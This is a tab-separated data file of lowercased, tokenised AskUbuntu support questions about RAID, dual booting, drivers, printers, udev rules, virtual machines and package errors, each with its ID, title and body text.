427945	mdadm raid 5 issues	not really sure where to start . pretty new to both raid and ubuntu so sorry in advance for any dumb questions . well here we go . been having some raid troubles lately , i got a raid5 array with 6 drives . basically 1 drive dropped out . /dev/sdf1 , i 'm pretty sure it was due to a hardware issue . i got it replaced but now its replacement dropped out for no good reason but to be sure i swapped it out to for a spare . anyway long story short . when i reboot now i get : '' errors were found while checking the disk drive for /media/storage '' so far i 've been skipping to load os than manually mount it after . mdadm -d /dev/md0 shows it as clean so i 'm at a loss on what do try . sorry for not posting any info . tbh i 'm not sure what commands to run to give relevant info . thanks in advance for any help . i 've used this site a lot to solve past issues but this is the 1st time i 've had to actually ask a question . basically i just got unlucky and the replacement disk was doa
427947	installation of ubuntu 12.04 or 13.10 in virtual box	i have a laptop with intel pentium b970 processor , 2 gb ram , 500 gb hdd with windows 7 professional ( 32 bit version ) as the os . ubuntu desktop 12.04 or ubuntu 13.10 ( both 32 bit versions ) installation hangs in vmware 6 and after successful installation of ubuntu in oracle virtualbox for windows , the virtualbox fails to start up again . how to do an installation of ubuntu 12.04 or 13.10 in such a laptop ?
427948	ubuntu for windows 8.1 ?	i would like to install your os into my laptop ( gaming x64bits ) that currently uses windows 8.1 pro and i would like to know if this will remove windows or have both os and if this will keep any of my files/programs windows office , games and docs/images thank you for your time .
427950	sound devices question	each time i put my speakers or earphones something `` weird '' happens . the minimal sound shifts . it is halfway through the bar . if i go less than half then no sound comes out . how to fix this ?
427952	ubuntu really slow - intel ssd	i 'm still having problems with my laptop ( not sure if this issue is related to this one ) . acer v5-122p . i installed a new ssd on it but it 's really slow . please find below some benchmarks : http : //pastebin.com/awq12ba1 do you think there is a problem with the ssd itself ? a configuration problem ? bottleneck ? many thanks for any help you can give me , nick .
427956	music manager with android sync support ?	primary : how can i manage a large music collection and sync parts of it to an android device ? secondary : to make it complicated , parts of the collection is stored in multiple formats . computer playback should use the best quality format ( for example flac ) and device sync should use something smaller ( vorbis , m4a , mp3 ) . i do not see my android phone anywhere on my system when connecting it to the computer . would expect to see it in the file manager or maybe in rhythmbox .
427957	problem about dual boot	first of all i am a beginner ... so please bear me ... .. i have installed ubuntu 14.04 while windows 7 already installed at this point everything is ok but problem begin when i installed windows 8.1 ; now only two operating systems seen me ( windows 7 and 8.1 ) but i want to use ubuntu 14.04 . now i have deleted windows 8.1 but my system shows only windows 7 while starting ... ..how can i get back ubuntu 14.04 please help me .
427967	toshiba laptop not working printer	i have a toshiba satellite c655d-s5200 with part # pscoyu -- o18001 . originally it had windows 7 premium black edition , i decided after testing the dual os system with 7 and 13.04 . first of all , it wo n't identify my cannon prixma 280 printer and it also wo n't play my dvds . i have computer desktop that does works , that 's a hp compact presario 6000 that when i hook up the printer to it the printer it works , the desktop has a dual os system with 7 & ubuntu thats works just perfect .
427969	using remote desktop with monitor connected fails	situation : i was running ubuntu 12.04 headless and then remote connecting from a windows box using remote desktop connection . this worked fine . in fact , more than once person could connect this way . then , i added a monitor to the headless box so i could , when i wanted to , log in there instead . thereafter , the remote desktop connection never worked again until i disconnected the monitor and rebooted the ubuntu box . why ?
427971	a place to share knowledge , tips & tricks and scripts ?	i am looking for a place to share experiences , knowledge , scripts , tips , tricks , etc . related to ubuntu . i went to ubuntuforums , but it seems that it is just for help . i wrote a complex script and translated it in english , hoping to share it ... but for now i have n't found where to share it : ) is there a forum , or a community such as described ?
427974	rhythmbox control panel not working	facing issue with rhythmbox control panel . i am unable to pause or play next song from control panel of rhythmbox music player
427975	eclipse and mspgcc on ubuntu	i download ubuntu on my mac computer as second operating system by using virtual box ware . i also installed eclipse and mspgcc . then i try to let them work together but i ended up with nothing . my purpose to blink the motes . i have this kit http : //www.advanticsys.com/shop/stkit-p-29.html and i want to blink them . also i followed this page https : //openwsn.atlassian.net/wiki/pages/viewpage.action ? pageid=11534370 now i need help to get this done . can anybody guide me because nothing worked sincerely
427976	key combination for acer erecovery does n't work after installing ubuntu	initially , i had 3 partitions : 15g recovery 100m boot 950g windows 7 i downsized the windows partition and installed ubuntu 12 into the free space . grub 2 found the recovery partition and added it to the menu . i can enter the recovery mode from grub , but ca n't by pressing alt+f10 . how to make alt+f10 work ?
427977	sound effects work , but mp3 , wav files produce no sound	i have a problem that started seemingly out of nowhere . ubuntu wo n't play mp3 , wav , mp4 , or any media file . the file loads and i can see progress , but no sound . when i go to sound effects and click any of the alert sounds , i hear that sound loud and clear . again in sound effects , under applications , rhythmbox is currently listed and it is not muted ( volume about 80 % ) . made no updates or changes to the system . please help .
427980	upgrade of ubuntu touch on nexus 4	i am running ubuntu touch on a nexus 4 . the os shows `` ubuntu 13.10 ( r101 ) '' . at what time will i be able to upgrade to 14.04 , i mean `` over the air '' ? or how can i upgrade now without loosing my data ( music , contacts ) ?
427982	installed ubuntu successfully but	i have installed ubuntu along with windows 7 on my pc using usb drive . after installation it asked me to restart . i rebooted the computer , but every time it is booted there is no option of choosing between windows 7 and ubuntu . by default windows is started always .
427985	udev rules for pendrive ( /dev/sdb1 ) to change owner , group , permissions	ubuntu 13.10 - need udev rule to change owner/permissions for /dev/sdb1 ( usb pendrive ) when plugged into computer . all combinations tried so far under /etc/udev/rules.d/99-pendrive have failed to achieve result . $ ls -l /dev/sdb* brw-rw -- -- 1 root disk 8 , 16 mar 1 15:58 /dev/sdb brw-rw -- -- 1 root disk 8 , 17 mar 1 15:58 /dev/sdb1 -- media information -- $ udevadm info -q all -n /dev/sdb1 p : /devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.0/host12/target12:0:0/12:0:0:0/block/sdb/sdb1 n : sdb1 s : disk/by-id/usb-generic_flash_disk_2c88ca09-0:0-part1 s : disk/by-path/pci-0000:00:14.0-usb-0:2:1.0-scsi-0:0:0:0-part1 s : disk/by-uuid/be6ed8126ed7c0f7 e : devlinks=/dev/disk/by-id/usb-generic_flash_disk_2c88ca09-0:0-part1 /dev/disk/by-path/pci-0000:00:14.0-usb-0:2:1.0-scsi-0:0:0:0-part1 /dev/disk/by-uuid/be6ed8126ed7c0f7 e : devname=/dev/sdb1 e : devpath=/devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.0/host12/target12:0:0/12:0:0:0/block/sdb/sdb1 e : devtype=partition e : id_bus=usb e : id_fs_type=ntfs e : id_fs_usage=filesystem e : id_fs_uuid=be6ed8126ed7c0f7 e : id_fs_uuid_enc=be6ed8126ed7c0f7 e : id_instance=0:0 e : id_model=flash_disk e : id_model_enc=flash\x20disk\x20\x20\x20\x20\x20\x20 e : id_model_id=6387 e : id_part_entry_disk=8:16 e : id_part_entry_flags=0x80 e : id_part_entry_number=1 e : id_part_entry_offset=2048 e : id_part_entry_scheme=dos e : id_part_entry_size=15972352 e : id_part_entry_type=0x7 e : id_part_table_type=dos e : id_path=pci-0000:00:14.0-usb-0:2:1.0-scsi-0:0:0:0 e : id_path_tag=pci-0000_00_14_0-usb-0_2_1_0-scsi-0_0_0_0 e : id_revision=8.07 e : id_serial=generic_flash_disk_2c88ca09-0:0 e : id_serial_short=2c88ca09 e : id_type=disk e : id_usb_driver=usb-storage e : id_usb_interfaces=:080650 : e : id_usb_interface_num=00 e : id_vendor=generic e : id_vendor_enc=generic\x20 e : id_vendor_id=058f e : major=8 e : minor=17 e : subsystem=block e : udisks_partition=1 e : udisks_partition_alignment_offset=0 e : udisks_partition_flags=boot e : udisks_partition_number=1 e : udisks_partition_offset=1048576 e : udisks_partition_scheme=mbr e : udisks_partition_size=8177844224 e : udisks_partition_slave=/sys/devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.0/host12/target12:0:0/12:0:0:0/block/sdb e : udisks_partition_type=0x07 e : udisks_presentation_nopolicy=0 e : usec_initialized=22314581 thx in advance .
427986	increase disk space for windows in a dual-boot configuration	i have a dual-booted computer with windows 8 and ubuntu . i need more hard drive space for windows , so i want to lower the amount of space i gave the ubuntu partition . how can i do that ?
427988	has the emerald window decorator been abandoned in terms of development ?	apparently , the emerald window decorator , which runs with the [ compiz window manager ] ( somehow i get the feeling that `` runs '' is not the correct word to use here ) , offers many fantastic-looking themes to the desktop . however , its ppa is not included ( though the default repositories contain compiz somewhere ) and it must be manually added before it can be sudo apt-get installed . compiz 's documentation on it is a bit spotty , but then again , a lot of compiz 's documentation seems a bit incomplete ( as in , there are section headers that have no content beneath them ) . is emerald still actively developed to keep up with new os releases , or will there be performance losses/quirks due to slight incompatibility ? it looks great ; i just do n't want to use it if it wo n't work 100 % correctly .
427993	ca n't boot into 13.10 on win 8 laptop	i installed ubuntu studio 13.10 over windows 8 on my uefi hp laptop ( pavilion 17-e016dx ) because of my metro hate . whenever i try to boot my computer , i get a grub 2 terminal saying that `` minimal bash-like editing is supported . '' i tried reinstalling , but that did n't fix it . any suggestions ?
427994	ubuntu 12.04 hangs on reboot	i 've got a gateway sx2855 with a dual boot to windows 7 or ubuntu 12.04.4 . cold starts work find , but when rebooting out of either windows or ubuntu , ubuntu hangs on the pink screen . here 's output from uname -a : linux mygateway 3.8.0-36-generic # 52~precise1-ubuntu smp mon feb 3 21:54:46 utc 2014 x86_64 x86_64 x86_64 gnu/linux
427996	how do i get xp and ubuntu to dual boot	i am partially disabled and new to ubuntu , i have two computers motherboards ( medion ms-7646 and gigabyte m61pme-s2 ) both can install ububtu 12.04 as single installation but not getting a choice of systems on restart , after trying to setup dual boot . have followed instructions on disk and many askubuntu websites and got no where . i only need windows for working on microsoft access 2000 ( have installation disk ) if this can done through wine how do i set it up . please spoon fed me answers .
427998	script to backup file deleting file	working on a bash script to take backup of a file , but the problem i get is that mv delete the file or rename it and create a file with the backupname . script : test= '' /home/sysadmin/test/hei2.back '' if [ -e `` $ test '' ] then echo `` $ test exist.\n '' else mv /home/sysadmin/test/hei.txt /home/sysadmin/test/hei2.back fi
427999	how to make shortcut with command ?	i want to open a .jar file with java . it is located in /home/myusername . i had to type in the terminal to open it java -jar filename.jar i want to have a shortcut that if i click it , it will run the command and launch the program with java automatically.. is there anything i could do ?
428001	how to export stored password from seahorse	is there any way to export stored secrets from seahorse 3.8.2 ( running on ubuntu 13.10 ) ( not public keys ) in order to import them ( directly or after a transformation ) into a keepass2 database ? i researched for some time now without a result ( neither positive nor negative ) .
428005	i am getting an error that says `` a problem occered when checking for updates ''	it has a red circle with a white line that goes through it , what do i do its very annoying and need it to be gone . i ca n't open ubuntu software center wich is a problem !
428006	libreoffice calc search area data question	( using libreoffice calc ) geppettvs d'constanzo answered a question how to create a table search in libreoffice calc ? i cant find a way to ask within the question/answer or ask him directly but i 'm hoping they either he will see this or someone else will know the answer is it possible to add a section within the 'search form ' that would list all citys for a state i.e . texas results is dallas and san antonio . i 've tried to do this but its getting a bit complex and i 'm wondering if there 's a simple way . thanks for any help anyone can give
428007	upgrading to 13.10	after upgrading to 13.10 ( suggested by the system ) i can not run ubuntu anymore so my computer is no longer usable ! the only thing i get is the root screen ( background is black ) where i can enter my user id and my pw , but when i do this i just get root access , that 's all . if i then type reboot the systems starts something and then hangs with only a - not blinking , on the top left of the ( black ) screen . i can i recover the use of my computer ?
428008	how to change the color of *just* the header ?	is there a non-hacky way to change the color of just the header in an app using the ubuntu sdk ? mainview has a headercolor property , but that is used as the first step of gradient . currently , i 'm just putting a colored rectangle up there : rectangle { id : headerbackground height : header.height width : header.width anchors.top : parent.top color : `` # 288369 '' } but this causes a number of issues , most notably it is incomparable with a listview that fills an entire page . a full example can be found in this gist .
428009	does each kvm guest need its own iso	does each kvm guest require its own copy of the bootable iso image ? if i 'm thinking correctly , the guest only needs to read the .iso , not lock it or anything , so multiple guests should be able to use the same iso . or am i approaching the problem the wrong way ? thanks in advance for your time !
428012	how to get scanner recognized after installing drivers ?	i installed scangear mp for linux on 12.04 lts . packages installed are : scangearmp-common_1.90-1_amd64.deb and scangearmp-mx890series_1.90-1_amd64.deb . simple scan is also installed . packages are n't recognized when scanner mx892 is connected to computer and turned on . when simple scan is used from dash , the scanner screen appears with statement that scanner is failed to be recognized .
428015	how can i install grub4dos to my usb stick ?	though i searched for web i could not find a guide to install grub4dos into my usb stick in ubuntu . is it possible in ubuntu ? if so , how can i install it into usb stick as a bootloader ?
428016	ubuntu bootable usb drive	i have installed the ubuntu 12.04 lts using a pen drive . firstly i made pendrive into a bootable usb drive which includes ubuntu .iso file extraction . after using that usb drive in my other laptop and installed on it , i am trying to make my usb drive for using other transfers . but it is not detected by my laptop afterwards . therefore , neither i am able to use that for other stuffs nor it gets unbootable.. so , give me solution .
428018	installing printer canon lbp-1210 on ubuntu 64 bit 12.04 lts	i typed the following codes as per instruction from a pdf file from website executed following commands the printer mentioned in file is lbp2900 . i changed it to suit my printer lbp1210 . sudo ./canonlbp_install.sh lbp1210 sudo /etc/init.d/cups restart sudo /usr/sbin/lpadmin -p lbp1210 -m cncupslbp1210captk.ppd -v ccp : /var/ccpd/fifo0 -e but after the line 3 error : lpadmin : bad device-uri scheme `` ccp '' is displayed . how can i solve this problem .
428022	how to get curly braces with norwegian macbook pro keyboard ?	im having trouble with my keyboard layout . i have a macbook pro ( june 2006 ) with 13.10 installed . i choose norwegian machintosh as keyboard layout , but i cant figure out how to create the third level characters , like curly braces . it also seems that pipe is mapped to the key left of 1 , so i have no idea where to find apostrophe . the layout in the `` keyboard layout chart '' doesnt even look like my keyboard . how can i get a correct keyboard layout ?
428024	how to run bittorrent sync web browser gui via ssl	i have installed bittorrent sync on my ubuntu server , but noticed that the web gui does not use ssl for login ( https : //server:8888/gui does not work , however http : //server:8888/gui does ) . this is both for logging in and using the gui while logged in . is there any way to force it to use ssl instead ?
428025	is it a good idea to scan external hdd with ubuntu ?	i have an external hard disk drive , and it may have some viruses in it . i do n't want to connect it to windows , so when i have to copy something from it , i do it in ubuntu . now i have to install a lot of -windows- programs from it , so does it make sense to install an antivirus ( like bitdefender ) and scan from ubuntu ? i mean , does just plugging it into windows puts me in danger ? can there be viruses in autorun.exe or such ? and which free antivirus should i use ?
428027	how to sysprep ubuntu to take its image	i am using fog to install images in my office . to clone and deploy windows images , sysprep is used to generalize the windows and to make sure it loses all the unique information like name n bla bla now i have to take image of ubuntu on fog server and to deploy it on 20 pcs . i am just wondering how do we sysprep ubuntu ( sorry i am using windows terminology but do n't know exactly what its called in ubuntu and how it works ) please assist .
428028	display setting of monitor	i did new installation of ubuntu 13.10 over old version 12.04.4 . my computer : intel i5-4440 processor . intel db85fl motherboard . samsung syncmaster 943 monitor . i am using a dvi-i to vga adapter . the 25+1 pin male side is connected to the dvi port of the computer , and the 15-pin vga side is connected on the other side of the dvi-i adapter . the display of the monitor got vertically squeezed or horizontally stretched . how to rectify/reset this to distortion free higher resolution ( with 16:9 aspect ratio ? ) . the terminal diagnose . ashoke @ ashoke-desktop : ~ $ lspci|grep vga 00:02.0 vga compatible controller : intel corporation xeon e3-1200 v3/4th gen core processor integrated graphics controller ( rev 06 ) ashoke @ ashoke-desktop : ~ $ xrandr screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 32767 x 32767 vga1 connected primary 1024x768+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 dp1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp2 disconnected ( normal left inverted right x axis y axis ) hdmi2 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) ashoke @ ashoke-desktop : ~ $ ashoke @ ashoke-desktop : ~ $ lspci 00:00.0 host bridge : intel corporation 4th gen core processor dram controller ( rev 06 ) 00:02.0 vga compatible controller : intel corporation xeon e3-1200 v3/4th gen core processor integrated graphics controller ( rev 06 ) 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) 00:14.0 usb controller : intel corporation 8 series/c220 series chipset family usb xhci ( rev 04 ) 00:16.0 communication controller : intel corporation 8 series/c220 series chipset family mei controller # 1 ( rev 04 ) 00:19.0 ethernet controller : intel corporation ethernet connection i217-v ( rev 04 ) 00:1a.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 04 ) 00:1d.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation b85 express lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 8 series/c220 series chipset family 6-port sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 8 series/c220 series chipset family smbus controller ( rev 04 ) ashoke @ ashoke-desktop : ~ $ thanks a lot johnnyd . the settings/software & updates/additional drivers show the following : “no additional drivers available” and “no proprietary drivers are in use” the 'lspci -nnk | grep -ia2 vga ' output is below . ashoke @ ashoke-desktop : ~ $ lspci -nnk | grep -ia2 vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation xeon e3-1200 v3/4th gen core processor integrated graphics controller [ 8086:0412 ] ( rev 06 ) subsystem : intel corporation device [ 8086:2052 ] kernel driver in use : i915 ashoke @ ashoke-desktop : ~ $
428031	why can not read folders on livecd ?	how do i move a folder to an external drive using a live disc ? when i try it says : the folder can not be handled because you do not have permission to read it . thanks for the help everyone . i got it copied by using sudo su nautilus .
428037	how to enable visual effects ( compiz ) without disabling unity ?	how can i install compiz fusion ( or whatever it is called ) to have visual effects like windows burning to ash on minimize , rotating ( 3d cube ) workspaces etc ? i was using compiz ( ccsm ) in 10.10 , but it does not work in 12.04 . i tried a lot of things , which mostly involved removing the sidebar ( unity ? ) but it caused even more problems . it would be great if someone posts a `` stable '' way to have both unity ( sidebar ) and visual effects . thanks in advance ! p.s . : it does not have to be compiz , if there are other alternatives which work well in 12.04
428039	missing dictionaries for spell-checking with kate and kile	spell-checking works in kate and kile , but only for english texts . it is not possible to select another language and dictionary . the selection of the dict is available for kate/kile at : settings - > configure kate/kile ... - > editor component - > editing the editing options contains a tab named `` spellcheck '' . at the top is a drop down menu named `` default language '' . the menu is nearly empty . it contains two entries one blank and ellipse `` ( ) '' . starting kate from the command line shows many messages : enchant dict for `` en '' selecting the `` ( ) '' as default language exchanges the `` en '' with `` en_za '' . i installed systemsettings from kde ( i am using ubuntu-desktop/unity ) . selecting locale - > spell checker contains the same drop down menu as it is available from kate and kile . i suppose that the problem was introduced during one many upgrades in the past . i installed the system some years ago ... any ideas how i get a german language and dictionary ? using gedit the german dict is selectable . these are my installed dictionaries/language packages : ii aspell-de 20120607-1 all german dictionary for aspell ii hunspell-de-de 20120607-1 all german dictionary for hunspell ii hyphen-de 1:3.3.0-2ubuntu3 all german hyphenation patterns for libreoffice/openoffice.org ii kde-l10n-de 4:4.11.5-0ubuntu0.1 all german ( de ) localization for kde ii language-pack-de 1:13.10+20131012 all translation updates for language german ii language-pack-gnome-de 1:13.10+20131012 all gnome translation updates for language german system is an up-to-date ubuntu 13.10 saucy , 64-bit . i am still facing this problem after update to 14.04 trusty . any ideas about how to get the german dictionary into kate ?
428044	internet conection problem during updating ?	i am new to ubuntu . i was connected to internet through cable and i my browser was working . i wanted to update my ubuntu but it was not updating instead system asked user-name and password ( my broadband connection login ) my browser is working but system is always saying check internet connection . how to update and download latest software through update manager .
428045	how do i install spellcheck in ubuntu web browser ?	i have problems with spellcheck not working and/or being enabled in firefox and with ubuntu web browser . i did not find any other posts with this topic . right now i am not concerned with firefox , just ubuntu , but an answer to firefox would be appreciated .
428054	installation process of ubuntu 12.04.4 does not proceed past the `` preparing to install ubuntu '' window	i am trying to install ubuntu 12.04.4 on my daughter 's latitude e5400 32 bit laptop.i booted from a usb drive , selected , install ubuntu . i get to the `` preparing to install ubuntu '' window , i have an internet connection and have enabled the download of updates and additional software . i press `` continue '' , but the process hangs up right there .
428056	trying to overwrite shared '/usr/share/doc/libfuse2/makefile.gz ' , which is different from other instances of package libfuse2 : i386	i have checked with update manager , it shows some simple updates of some useless software and that is also not getting installed and gives the message the broken package and it is irritating me with same message . it gave me this command sudo apt-get install -f after running it says : $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following package was automatically installed and is no longer required : openjdk-7-jre-lib use 'apt-get autoremove ' to remove it . the following extra packages will be installed : libfuse2 : i386 the following new packages will be installed : libfuse2 : i386 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/138 kb of archives . after this operation , 323 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 236898 files and directories currently installed . ) unpacking libfuse2 : i386 ( from ... /libfuse2_2.9.0-1ubuntu3_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libfuse2_2.9.0-1ubuntu3_i386.deb ( -- unpack ) : trying to overwrite shared '/usr/share/doc/libfuse2/makefile.gz ' , which is different from other instances of package libfuse2 : i386 errors were encountered while processing : /var/cache/apt/archives/libfuse2_2.9.0-1ubuntu3_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
428057	how to uninstall ubuntu from one drive and install in another drive ?	i 've recently installed ubuntu 13.04 . on the installation process i 've select `` install ubuntu alongside windows 7 '' or the option similar of that . so i did n't know in which drive ubuntu is installed ( windows 7 is in drive c ) . i did n't find out any option on control panel ( in windows 7 ) to remove ubuntu . can anyone tell me how to remove ubuntu so that i can install it in my desire drive ? thanks
428058	dell inspiron 3537 , problems with resuming from suspend with amd radeon hd 8800m graphics card	i installed ubuntu ( 12.04.04 lts , 64 bit ) on a laptop dell inspiron 3537 . it 's working great . recently , i had some trouble with running applications through wine . those problems were resolved once i installed some additional drivers . the problem is , when going to system settings > additional drivers , the only option there is this : while this did fix my earlier problems with the wine applications , i 'm now facing new problems - every time i close the lid , when i open it up again i see a black screen and only the mouse ( but i ca n't move it ) . the computer does n't respond to anything i do , and i have to forcibly shut it down and start again . if i leave the computer open , and it goes to sleep , then this problem does n't happen . i 'm guessing this has to do with the driver being `` experimental '' and all , though i have n't faced any other major issue since installing . i would change the driver to a non-experimental one , but as you can see from the image , ubuntu is n't offering any alternative . running the command lspci | grep vga returns this output : 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) 03:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] venus pro [ radeon hd 8800m series ] any ideas what i should do\try ? update i just installed the earlier non-experimental video drivers through synaptic and after rebooting , the problem still persists . what 's the problem here ? update2 alright , so i did two things . first , i followed these instructions , and after a failed resume and reboot i created a dmesg.txt file , which contained three mentions of hash matches : [ 1.766773 ] magic number : 0:665:273 [ 1.766776 ] hash matches /build/buildd/linux-lts-saucy-3.11.0/drivers/base/power/main.c:643 [ 1.766798 ] tty tty10 : hash matches [ 1.766804 ] net lo : hash matches second thing i did was run the command dmesg | grep fglrx , which returned this : [ 12.203459 ] fglrx : module license 'proprietary . ( c ) 2002 - ati technologies , starnberg , germany ' taints kernel . [ 12.206400 ] fglrx : module verification failed : signature and/or required key missing - tainting kernel [ 12.210284 ] < 6 > [ fglrx ] maximum main memory to use for locked dma buffers : 7634 mbytes . [ 12.210440 ] < 6 > [ fglrx ] vendor : 1002 device : 6823 count : 1 [ 12.210639 ] < 6 > [ fglrx ] ioport : bar 4 , base 0x3000 , size : 0x100 [ 12.210748 ] < 6 > [ fglrx ] kernel pat support is enabled [ 12.210760 ] < 6 > [ fglrx ] module loaded - fglrx 13.30.1 [ jan 8 2014 ] with 1 minors [ 42.760504 ] fglrx_pci 0000:03:00.0 : irq 66 for msi/msi-x [ 42.760981 ] < 6 > [ fglrx ] firegl kernel thread pid : 1513 [ 42.761024 ] < 6 > [ fglrx ] firegl kernel thread pid : 1514 [ 42.761065 ] < 6 > [ fglrx ] firegl kernel thread pid : 1515 [ 42.761152 ] < 6 > [ fglrx ] irq 66 enabled [ 42.772492 ] < 6 > [ fglrx ] reserved fb block : shared offset:0 , size:1000000 [ 42.772495 ] < 6 > [ fglrx ] reserved fb block : unshared offset : f878000 , size:4000 [ 42.772496 ] < 6 > [ fglrx ] reserved fb block : unshared offset : f87c000 , size:484000 [ 42.772497 ] < 6 > [ fglrx ] reserved fb block : unshared offset:7fff4000 , size : c000 i 'm thinking the fglrx : module verification failed : signature and/or required key missing is the important part . any ideas how to solve it ?
428065	turning off the ability to suspend on ubuntu 13.10	when i suspend ubuntu i ca n't get out of the suspend screen . yes , i know there are ways to fix this but that would take forever to fix . is there a way to disable the ability to suspend ?
428068	install windows 7 with ubuntu 12.04	i am running ubuntu 12.04 on my laptop right now and i also want windows 7 . i want to dual boot . i am unable to partition the disk because it 's not possible to shrink the hard-drive . i saw a couple of youtube videos for parting the hard disk and tried with ubuntu livecd but it showed an error that it could not unpack it and i was unable to reach 'try ubuntu ' . please help !
428071	library that will send me an email when the log file changes	i 'm looking for a library that will send me an email when the log file changes . is there any ? thanks .
428072	64-bit db2 10.5 missing 32-bit libpam and 64-bit libaio on ubuntu 12.04	this happened to me . if it 's happening to you , maybe this can save you a bit of time . i was installing 64-bit db2 10.5 server ( not sure exactly what product package -- someone gave it to me ) on a softlayer 64-bit ubuntu 12.04 linux system that included a lamp stack . bottom line first : it turns out that i was missing 32-bit libpam and 64-bit libaio and needed to do : apt-get install libpam0g : i386 libaio1 most folks ' mileage will undoubtedly vary . in case only part of the experience applies to you , and would be helpful for you , here is more detail . before the install , db2prereqcheck complained : dbt3514w the db2prereqcheck utility failed to find the following 32-bit library file : `` /lib/libpam.so* '' . sure enough , all i had was : /lib/x86_64-linux-gnu/libpam.so.0.83.0 /lib/x86_64-linux-gnu/libpamc.so.0 /lib/x86_64-linux-gnu/libpam.so.0 /lib/x86_64-linux-gnu/libpam_misc.so.0.82.0 /lib/x86_64-linux-gnu/libpamc.so.0.82.1 /lib/x86_64-linux-gnu/libpam_misc.so.0 after looking around the web a bit , i did : apt-get install libpam0g : i386 after which i also had : /lib/i386-linux-gnu/libpam.so.0.83.0 /lib/i386-linux-gnu/libpamc.so.0 /lib/i386-linux-gnu/libpam.so.0 /lib/i386-linux-gnu/libpam_misc.so.0.82.0 /lib/i386-linux-gnu/libpamc.so.0.82.1 /lib/i386-linux-gnu/libpam_misc.so.0 but db2prereqcheck still made the same complaint . a number of places on the web recommended : ln -s /lib/i386-linux-gnu/libpam.so.0 /lib/libpam.so.0 but that seemed to me like a grotesque hack , that would be sure to land me in different trouble with different applications farther down the road . i tried a number of things with environment variables , including ld_library_path and ld_library_path_32 , but nothing helped with the db2prereqcheck . someone i trust said to just go ahead with the install anyway . so i did db2_install ( it was a remote headless system ) , and although the db2prereqcheck that runs as part of the install complained , the install did work . sadly , db2start complained : sqllib/adm/db2start : error while loading shared libraries : libaio.so.1 : wrong elf class : elfclass32 someone i trusted recommended : apt-get install libaio1 which installed 64-bit libaio ( prior to that my system only included 32-bit ) , after which i ended up with : /lib/i386-linux-gnu/libaio.so.1.0.1 /lib/i386-linux-gnu/libaio.so.1 /lib/x86_64-linux-gnu/libaio.so.1.0.1 /lib/x86_64-linux-gnu/libaio.so.1 after that , everything went fine . again , bottom line : i was missing 32-bit libpam and 64-bit libaio . btw , my system image already included packages libstdc++6 and lib32stdc++6 -- something which a lot of folks seem to be missing in their environments . hope this helps .
428073	how many hours the computer is running for upgrade linux ubuntu ?	i tried to upgrade my linux ubuntu to version 12.04 . now , it is about 24 hours my computer is running and upgrading is not finished . what i should do ?
428078	why wo n't my shared folder mirror the files from my ubuntu in windows ?	i am having a problem with sharing of folders with the host . i have an ubuntu 13.10 installed on vmware workstation 8 . i have windows 8 as host . i tried almost every possible solutions available but i did not get any result . the first thing i tried is enabling the shared folder in the settings of vmware but when i checked my cd /mnt/hgfs directory , i did not see the newly created folder . the second thing i tried is sudo vmware-config-tools.pl and updated my fstab gksu gedit /etc/fstab and added this line : .host : /logfiles /media/sharedfolder vmhgfs defaults , ttl=5 , uid=1000 , gid=1000 0 0 with the logfiles as the folder i shared in the settings > option > shared folder i also tried updating my vmware tools . third thing i tried : install open-vm-tools sudo apt-get install open-vm-tools create mount point for shared folders mkdir /media/sharedfolder go to the scripts services directory : cd /etc/init.d create script to load at the boot time ( if you prefer you can use nano instead of vim ) : sudo vim mountshfolder # ! /bin/bash # load vmhgfs kernel module modprobe vmhgfs # mount vmware share folder mount -t vmhgfs .host : /logfiles /media/sharedfolder exit` give executable permission to the script : sudo chmod a+x mountshfolder set the script to be execute for all runlevels : sudo update-rc.d mountshfolder defaults and it successfully created a folder in my desktop ( windows 8 ) with the folder name ubuntu shared folder and i checked my media and found that there is `` sharedfolder '' folder created but when i tried putting text files inside it , it does n't appear in my ubuntu shared folder in my desktop ( host ) .
428079	is there a native ubuntu version of mario forever ?	i have ubuntu 12.04 lts and i also have wine . i was hoping that there was some version of mario forever that does not require wine . is there any such version , and if yes , does anyone have a link or command to install it ?
428082	lubuntu fan control acer aspire ao751h	i 'm a complete newbie at this . decided to make my acer aspire one useful again by installing linux . i installed lubuntu 13.10 after trying out other distros and it works great . the one problem i ca n't seem to solve or find the answer to anywhere is my fan is constantly running at high speed from bootup to shutdown . i do n't think this is normal . is there anyway to fix this ? is it just my netbook ca n't handle the distro ? it 's an acer aspire one ao751h , 1.3 ghz , 1gb ram . thanks !
428084	can stardict consol version sdcv work with a chinese-english dictionary ?	can stardict consol version sdcv work with a chinese-english dictionary tardict-cc-cedict.tar.bz2 ? i extract the dictionary to /usr/share/stardict/dic , and try with an error $ sdcv 淀粉 nothing similar to 淀粉 , sorry : ( what chinese-english dictionary files would you recommend ? thanks !
428085	how do i move windows control button to the right ?	i 've tried several ways like using dconf , gconf and compiz but neither of those worked . it 's set to minimize , maximize , close now and did n't move to the right even after restart why is n't it working ? i 'm desperate . can not tolerate those on the left side . thanks
